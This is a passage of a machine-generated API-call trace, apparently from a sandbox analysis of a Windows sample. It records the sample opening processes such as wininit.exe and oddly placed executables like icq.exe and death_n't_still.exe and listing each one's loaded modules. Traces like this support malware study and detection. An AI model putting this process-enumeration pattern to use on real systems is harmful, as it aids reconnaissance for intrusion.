EnumProcessModules (in: hProcess=0x218, lphModule=0x2526f28, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2526f28, lpcbNeeded=0x41eb20) returned 1 [0044.266] GetModuleInformation (in: hProcess=0x218, hModule=0xff0c0000, lpmodinfo=0x2527198, cb=0x18 | out: lpmodinfo=0x2527198*(lpBaseOfDll=0xff0c0000, SizeOfImage=0x23000, EntryPoint=0xff0c6290)) returned 1 [0044.267] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.267] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff0c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wininit.exe") returned 0xb [0044.267] CoTaskMemFree (pv=0x780780) [0044.267] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.267] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff0c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wininit.exe" (normalized: "c:\\windows\\system32\\wininit.exe")) returned 0x1f [0044.268] CoTaskMemFree (pv=0x780780) [0044.268] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2529390, cb=0x18 | out: lpmodinfo=0x2529390*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0044.268] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.268] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0044.269] CoTaskMemFree (pv=0x780780) [0044.269] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.269] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0044.270] CoTaskMemFree (pv=0x780780) [0044.270] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x252b550, cb=0x18 | out: lpmodinfo=0x252b550*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0044.270] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.270] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0044.271] CoTaskMemFree (pv=0x780780) [0044.271] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.271] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0044.272] CoTaskMemFree (pv=0x780780) [0044.272] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x252d720, cb=0x18 | out: lpmodinfo=0x252d720*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0044.272] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.272] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0044.273] CoTaskMemFree (pv=0x780780) [0044.273] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.273] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0044.274] CoTaskMemFree (pv=0x780780) [0044.274] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x252f8f0, cb=0x18 | out: lpmodinfo=0x252f8f0*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0044.275] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.275] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0044.276] CoTaskMemFree (pv=0x780780) [0044.276] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.276] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0044.277] CoTaskMemFree (pv=0x780780) [0044.277] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2531b08, cb=0x18 | out: lpmodinfo=0x2531b08*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0044.278] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.279] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0044.279] CoTaskMemFree (pv=0x780780) [0044.279] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.279] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0044.280] CoTaskMemFree (pv=0x780780) [0044.280] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x2533cc8, cb=0x18 | out: lpmodinfo=0x2533cc8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0044.281] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.281] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0044.282] CoTaskMemFree (pv=0x780780) [0044.282] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.282] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0044.283] CoTaskMemFree (pv=0x780780) [0044.283] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x2535e78, cb=0x18 | out: lpmodinfo=0x2535e78*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0044.284] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.284] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0044.285] CoTaskMemFree (pv=0x780780) [0044.285] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.285] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0044.286] CoTaskMemFree (pv=0x780780) [0044.287] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x2538050, cb=0x18 | out: lpmodinfo=0x2538050*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0044.288] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.288] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0044.289] CoTaskMemFree (pv=0x780780) [0044.289] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.289] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0044.290] CoTaskMemFree (pv=0x780780) [0044.290] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x253a2a8, cb=0x18 | out: lpmodinfo=0x253a2a8*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0044.296] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.296] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0044.298] CoTaskMemFree (pv=0x780780) [0044.298] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.298] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0044.299] CoTaskMemFree (pv=0x780780) [0044.299] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x253c468, cb=0x18 | out: lpmodinfo=0x253c468*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0044.300] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.300] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0044.301] CoTaskMemFree (pv=0x780780) [0044.301] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.301] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0044.303] CoTaskMemFree (pv=0x780780) [0044.303] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x253e628, cb=0x18 | out: lpmodinfo=0x253e628*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0044.304] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.304] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0044.305] CoTaskMemFree (pv=0x780780) [0044.305] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.305] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0044.306] CoTaskMemFree (pv=0x780780) [0044.306] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x25407e8, cb=0x18 | out: lpmodinfo=0x25407e8*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0044.308] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.308] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0044.309] CoTaskMemFree (pv=0x780780) [0044.310] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.310] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0044.311] CoTaskMemFree (pv=0x780780) [0044.311] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x25429a8, cb=0x18 | out: lpmodinfo=0x25429a8*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0044.312] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.312] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0044.314] CoTaskMemFree (pv=0x780780) [0044.314] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.314] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0044.315] CoTaskMemFree (pv=0x780780) [0044.315] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x2544b68, cb=0x18 | out: lpmodinfo=0x2544b68*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0044.317] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.317] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0044.318] CoTaskMemFree (pv=0x780780) [0044.319] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.319] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0044.320] CoTaskMemFree (pv=0x780780) [0044.320] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x2546d38, cb=0x18 | out: lpmodinfo=0x2546d38*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0044.321] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.321] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0044.323] CoTaskMemFree (pv=0x780780) [0044.324] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.324] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0044.325] CoTaskMemFree (pv=0x780780) [0044.325] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x2548f08, cb=0x18 | out: lpmodinfo=0x2548f08*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0044.327] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.327] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0044.328] CoTaskMemFree (pv=0x780780) [0044.329] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.329] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0044.330] CoTaskMemFree (pv=0x780780) [0044.330] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x254b1e0, cb=0x18 | out: lpmodinfo=0x254b1e0*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0044.332] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.332] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0044.333] CoTaskMemFree (pv=0x780780) [0044.334] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.334] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0044.335] CoTaskMemFree (pv=0x780780) [0044.335] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd010000, lpmodinfo=0x254d390, cb=0x18 | out: lpmodinfo=0x254d390*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0044.336] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.336] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd010000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0044.340] CoTaskMemFree (pv=0x780780) [0044.340] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.340] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd010000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0044.341] CoTaskMemFree (pv=0x780780) [0044.341] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca10000, lpmodinfo=0x254f550, cb=0x18 | out: lpmodinfo=0x254f550*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0044.343] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.343] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca10000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0044.344] CoTaskMemFree (pv=0x780780) [0044.345] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.345] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca10000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0044.346] CoTaskMemFree (pv=0x780780) [0044.346] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd000000, lpmodinfo=0x2551720, cb=0x18 | out: lpmodinfo=0x2551720*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0044.348] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.348] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd000000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0044.350] CoTaskMemFree (pv=0x780780) [0044.350] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.350] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd000000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0044.352] CoTaskMemFree (pv=0x780780) [0044.352] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x25538e0, cb=0x18 | out: lpmodinfo=0x25538e0*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0044.354] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.354] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0044.356] CoTaskMemFree (pv=0x780780) [0044.356] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.356] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0044.358] CoTaskMemFree (pv=0x780780) [0044.358] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x2555aa0, cb=0x18 | out: lpmodinfo=0x2555aa0*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0044.360] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.360] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0044.362] CoTaskMemFree (pv=0x780780) [0044.362] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.362] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0044.363] CoTaskMemFree (pv=0x780780) [0044.363] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x2557c60, cb=0x18 | out: lpmodinfo=0x2557c60*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0044.365] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.365] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0044.366] CoTaskMemFree (pv=0x780780) [0044.366] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.366] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0044.368] CoTaskMemFree (pv=0x780780) [0044.368] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x2559e20, cb=0x18 | out: lpmodinfo=0x2559e20*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0044.370] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.370] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0044.371] CoTaskMemFree (pv=0x780780) [0044.371] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.372] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0044.373] CoTaskMemFree (pv=0x780780) [0044.373] CloseHandle (hObject=0x218) returned 1 [0044.375] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x218 [0044.375] EnumProcessModules (in: hProcess=0x218, lphModule=0x255cbd0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x255cbd0, lpcbNeeded=0x41eb20) returned 1 [0044.375] GetModuleInformation (in: hProcess=0x218, hModule=0x1250000, lpmodinfo=0x255ce40, cb=0x18 | out: lpmodinfo=0x255ce40*(lpBaseOfDll=0x1250000, SizeOfImage=0x17000, EntryPoint=0x12514a1)) returned 1 [0044.375] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.375] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x1250000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="icq.exe") returned 0x7 [0044.376] CoTaskMemFree (pv=0x780780) [0044.376] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.376] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x1250000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Internet Explorer\\icq.exe" (normalized: "c:\\program files\\internet explorer\\icq.exe")) returned 0x2a [0044.376] CoTaskMemFree (pv=0x780780) [0044.376] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x255f048, cb=0x18 | out: lpmodinfo=0x255f048*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0044.376] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.377] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0044.377] CoTaskMemFree (pv=0x780780) [0044.377] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.377] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0044.377] CoTaskMemFree (pv=0x780780) [0044.377] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2561208, cb=0x18 | out: lpmodinfo=0x2561208*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0044.378] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.378] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0044.378] CoTaskMemFree (pv=0x780780) [0044.378] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.378] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0044.379] CoTaskMemFree (pv=0x780780) [0044.379] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25633c8, cb=0x18 | out: lpmodinfo=0x25633c8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0044.379] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.379] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0044.380] CoTaskMemFree (pv=0x780780) [0044.380] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.380] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0044.380] CoTaskMemFree (pv=0x780780) [0044.380] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2565598, cb=0x18 | out: lpmodinfo=0x2565598*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0044.380] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.380] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0044.381] CoTaskMemFree (pv=0x780780) [0044.381] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.381] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0044.381] CoTaskMemFree (pv=0x780780) [0044.382] CloseHandle (hObject=0x218) returned 1 [0044.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa6c) returned 0x218 [0044.382] EnumProcessModules (in: hProcess=0x218, lphModule=0x2567ca8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2567ca8, lpcbNeeded=0x41eb20) returned 1 [0044.382] GetModuleInformation (in: hProcess=0x218, hModule=0xd70000, lpmodinfo=0x2567f18, cb=0x18 | out: lpmodinfo=0x2567f18*(lpBaseOfDll=0xd70000, SizeOfImage=0x17000, EntryPoint=0xd714a1)) returned 1 [0044.383] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.383] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xd70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="death_n't_still.exe") returned 0x13 [0044.383] CoTaskMemFree (pv=0x780780) [0044.383] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.383] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xd70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\death_n't_still.exe" (normalized: "c:\\program files\\windowspowershell\\death_n't_still.exe")) returned 0x36 [0044.383] CoTaskMemFree (pv=0x780780) [0044.383] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x256a168, cb=0x18 | out: lpmodinfo=0x256a168*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0044.384] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.384] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0044.384] CoTaskMemFree (pv=0x780780) [0044.384] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.384] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, 